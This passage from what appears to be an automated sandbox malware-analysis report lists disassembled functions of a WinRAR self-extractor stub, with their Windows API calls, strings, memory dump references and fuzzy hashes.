                                                                                  • Instruction Fuzzy Hash: 6741B171905518AAEB20EB61DD45EEEB37CAF01344F0040ABB15A731C1DB78AF89CF69
                                                                                  Function 0040D3EE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D46E
                                                                                  • GetDlgItemTextW.USER32(?,00000065,?,?), ref: 0040D483
                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D498
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$Dialog
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 1770891597-3402441367
                                                                                  • Opcode ID: 333ff92a145256b3d73e268582a3974dcadf7a6aad4be80f4f5285986db0e231
                                                                                  • Instruction ID: 15e289bba468da19e455fbefc74a83a6ceb9ff2e3901e96efcbcfe65ae9c2d6f
                                                                                  • Opcode Fuzzy Hash: 333ff92a145256b3d73e268582a3974dcadf7a6aad4be80f4f5285986db0e231
                                                                                  • Instruction Fuzzy Hash: 0411BE35600200BBDA219FA99C05F7A7B65EB0A710F404036FA04FB1E0C77AE8299B5E
                                                                                  Function 004122BE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3963884845-3916222277
                                                                                  • Opcode ID: 998ec32a5e386615b93d6f4244c34cdf95a11c1f1b85263ae2f4bdb4c5e46d64
                                                                                  • Instruction ID: 9868739e28bef30231c1be6cae71f5b78048776ea8f5e7649061fa3df6c70597
                                                                                  • Opcode Fuzzy Hash: 998ec32a5e386615b93d6f4244c34cdf95a11c1f1b85263ae2f4bdb4c5e46d64
                                                                                  • Instruction Fuzzy Hash: C611E471E00218AACB14EFA9DA816DEB7B5FF44344F10406BE914E7241D6BC5B918B98
                                                                                  Function 0040D327 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D36E
                                                                                  • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 0040D386
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040D3B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$Dialog
                                                                                  • String ID: GETPASSWORD1
                                                                                  • API String ID: 1770891597-3292211884
                                                                                  • Opcode ID: 20e2f1ddc2ef6257760d1ba2491fb38f136181ff332860c78de716e12c93cd10
                                                                                  • Instruction ID: 2a770bd969fb2baa3b8105a971bde4933cdc7b5be713713aac62907d5d6dcd4b
                                                                                  • Opcode Fuzzy Hash: 20e2f1ddc2ef6257760d1ba2491fb38f136181ff332860c78de716e12c93cd10
                                                                                  • Instruction Fuzzy Hash: 90118232A00118A7DB219FA19C09FFF3A6DEF49754F404036FE45B61C0D678896696AA
                                                                                  Function 00410CF5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(000001A0,?,0044E590,?,00410E85,00000020,?,00409821,?,?,?,0040BA2E,?,?,00000000,?), ref: 00410D2E
                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00409821,?,?,?,0040BA2E,?,?,00000000,?,?,0041225E), ref: 00410D38
                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00409821,?,?,?,0040BA2E,?,?,00000000,?,?,0041225E), ref: 00410D4A
                                                                                  Strings
                                                                                  • Thread pool initialization failed., xrefs: 00410D62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: ac40f6525d483723daf1a6bb0360d02b98909488f345eda45118b6fe413c7db8
                                                                                  • Instruction ID: 3831822a01a909cb0c442bf49b56b14b4ba0a41f1b1af5e4292efc31b2b47fd2
                                                                                  • Opcode Fuzzy Hash: ac40f6525d483723daf1a6bb0360d02b98909488f345eda45118b6fe413c7db8
                                                                                  • Instruction Fuzzy Hash: B9112AB1600710AFD3305FA5A885BE7BBE8EB55355F60482EE6DA86241D6B828D0CB14
                                                                                  Function 0040D9C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040D8FF: _wcscpy.LIBCMT ref: 0040D904
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,?,?), ref: 0040DA01
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040DA2E
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DA67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue_wcscpy
                                                                                  • String ID: Software\WinRAR SFX
                                                                                  • API String ID: 2005349754-754673328
                                                                                  • Opcode ID: 16ee73aa1ccdb387a43e19c670acc848210dbdabe20da61b4f0a43b3b1cb1cfe
                                                                                  • Instruction ID: 299795ea68faa4c574b81033cb9cdb2eb28d5543db85a4fafce3c64357ef6920
                                                                                  • Opcode Fuzzy Hash: 16ee73aa1ccdb387a43e19c670acc848210dbdabe20da61b4f0a43b3b1cb1cfe
                                                                                  • Instruction Fuzzy Hash: 9D113A35A00208EBEF219FA1DD44FDD7B78EB04344F4040A6B904A2190D6749A95DB69
                                                                                  Function 004050E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SHGetMalloc.SHELL32(?), ref: 004050ED
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00405128
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: BrowseFolderMalloc
                                                                                  • String ID: A
                                                                                  • API String ID: 3812826013-3554254475
                                                                                  • Opcode ID: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
                                                                                  • Instruction ID: b708c960d31f11428b04183cc59b35204deedca2250ff978b2db94b38b52d361
                                                                                  • Opcode Fuzzy Hash: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
                                                                                  • Instruction Fuzzy Hash: F8012372900219EBCB10CFA4D809BEF7BF8EF49311F2041A6E805A6240D7388A058FA5
                                                                                  Function 0040E578 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 0fad6ce56f2de7d3376022315dec326d7fcf2b5a0991145b78f940dc76bdd9e5
                                                                                  • Instruction ID: ab74704cbbb8baf2ad3952107d87f02ab575f0d4d1926936fa7ef8990c04433a
                                                                                  • Opcode Fuzzy Hash: 0fad6ce56f2de7d3376022315dec326d7fcf2b5a0991145b78f940dc76bdd9e5
                                                                                  • Instruction Fuzzy Hash: 7101B535615214BFC701EB55FE40A167BD5E789358F140C3BF601A22A0E2368835DFAE
                                                                                  Function 0041DEE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBCMT ref: 0041DEF5
                                                                                    • Part of subcall function 0041DE50: ___BuildCatchObjectHelper.LIBCMT ref: 0041DE86
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0041DF0C
                                                                                  • ___FrameUnwindToState.LIBCMT ref: 0041DF1A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                  • String ID: csm
                                                                                  • API String ID: 2163707966-1018135373
                                                                                  • Opcode ID: da80a6d951740ae99da5115fd17c8ff422e8875fd643a6a7434c62be7bb70cd0
                                                                                  • Instruction ID: bbd11558e6a5c6f91b6ea39c8288bc8ddcb8bca3f7f602b2b51e878f0fdf9860
                                                                                  • Opcode Fuzzy Hash: da80a6d951740ae99da5115fd17c8ff422e8875fd643a6a7434c62be7bb70cd0
                                                                                  • Instruction Fuzzy Hash: A30146B1800209BBCF12AF52CC41EEB3F6AEF08344F004016FD1815161D73AD9B2EBA8
                                                                                  Function 0040BFA8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040BFB7
                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040BFC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: LTR$RTL
                                                                                  • API String ID: 3537982541-719208805
                                                                                  • Opcode ID: 4e6b068edd868967d6180040b6ed26316e81829012ad96dfd4a263fa787e6937
                                                                                  • Instruction ID: 5a4550940e43178cae73f81ae7c2dd1265457720ddde325ad6ed990b3a259bec
                                                                                  • Opcode Fuzzy Hash: 4e6b068edd868967d6180040b6ed26316e81829012ad96dfd4a263fa787e6937
                                                                                  • Instruction Fuzzy Hash: 9FF0242134022077D62067B56C0AFE72B6CEB41314F10007AB605E60C0DFA8D49A8BEE
                                                                                  Function 00423213 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0041D610), ref: 00423218
                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                  • API String ID: 1646373207-3105848591
                                                                                  • Opcode ID: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
                                                                                  • Instruction ID: 3c98e9928195b457dec1495e07e2bf6944307f67708ad0ac31448c6a985ad81a
                                                                                  • Opcode Fuzzy Hash: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
                                                                                  • Instruction Fuzzy Hash: FBF06D30B00A1AE2DF101FA1BC0A66FBB74FB80742FD20091D6D2B0094CF3881B1829A
                                                                                  Function 004197AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004197E2
                                                                                  • RegisterClassExW.USER32(00000030), ref: 00419803
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassCursorLoadRegister
                                                                                  • String ID: 0$RarHtmlClassName
                                                                                  • API String ID: 1693014935-3342523147
                                                                                  • Opcode ID: af3eaafe2746200d7010029f25febe6697ea9bf4d54c467e941758c616e3bb28
                                                                                  • Instruction ID: ce230cc3275f868db8caccb84d2986fa2ce8d0dd58158da22838b3632dfa4e97
                                                                                  • Opcode Fuzzy Hash: af3eaafe2746200d7010029f25febe6697ea9bf4d54c467e941758c616e3bb28
                                                                                  • Instruction Fuzzy Hash: 7CF0C9B1D11218EBDB019F99D944ADEFBF8FF58704F10805BE510B7250D7B516058FA9
                                                                                  Function 0040D4A7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D4C0
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D4F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 1431749950-3493335439
                                                                                  • Opcode ID: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
                                                                                  • Instruction ID: 8d89ab96a1e125908346198fed3aeda265900fda955490a9a690e3b5c2127d3d
                                                                                  • Opcode Fuzzy Hash: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
                                                                                  • Instruction Fuzzy Hash: DBE0EC7650011836CA102695DD01FA67B6CEF80784F104037FE41A6091D978A8968BE9
                                                                                  Function 00410BE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32,0040FD0B,00000001), ref: 00410BED
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410BFD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: SetDllDirectoryW$kernel32
                                                                                  • API String ID: 1646373207-2052158636
                                                                                  • Opcode ID: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
                                                                                  • Instruction ID: 59ca9bbb54ad1dc253c25414b0a5b463fc1b68461d4099d311e843f210457434
                                                                                  • Opcode Fuzzy Hash: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
                                                                                  • Instruction Fuzzy Hash: B0D0A7B03002219B4B1C0F726D19F6726588B40F45754423F7E06D1080DF7CC0B0A52F
                                                                                  Function 00409055 Relevance: 6.1, APIs: 4, Instructions: 128filetimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,0040747C,?,?,?), ref: 004090ED
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,0040747C,?,?,?,?), ref: 00409124
                                                                                  • SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,0040747C,?,?,?,?), ref: 00409195
                                                                                  • CloseHandle.KERNEL32(?,?,0040747C,?,?,?,?), ref: 0040919E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 2287278272-0
                                                                                  • Opcode ID: 6746ec83112f8ef3806bdff4ad86524e3acb39efa96188061f3d4a87c73603e7
                                                                                  • Instruction ID: f35a5a3ed0d1054a0b459a2bb0eb3064bacac3bd9b34612e11fda0545b4c1239
                                                                                  • Opcode Fuzzy Hash: 6746ec83112f8ef3806bdff4ad86524e3acb39efa96188061f3d4a87c73603e7
                                                                                  • Instruction Fuzzy Hash: 0041BF30A00149AEEF11DBA4CC49FEE7BB9AF05314F0440AAF451BB2D2C7799E85CB58
                                                                                  Function 00424D7E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00424DB2
                                                                                  • __isleadbyte_l.LIBCMT ref: 00424DE6
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A72A,?,00000000,00000000,?,?,?,?,0041A72A,00000000,?), ref: 00424E17
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A72A,00000001,00000000,00000000,?,?,?,?,0041A72A,00000000,?), ref: 00424E85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
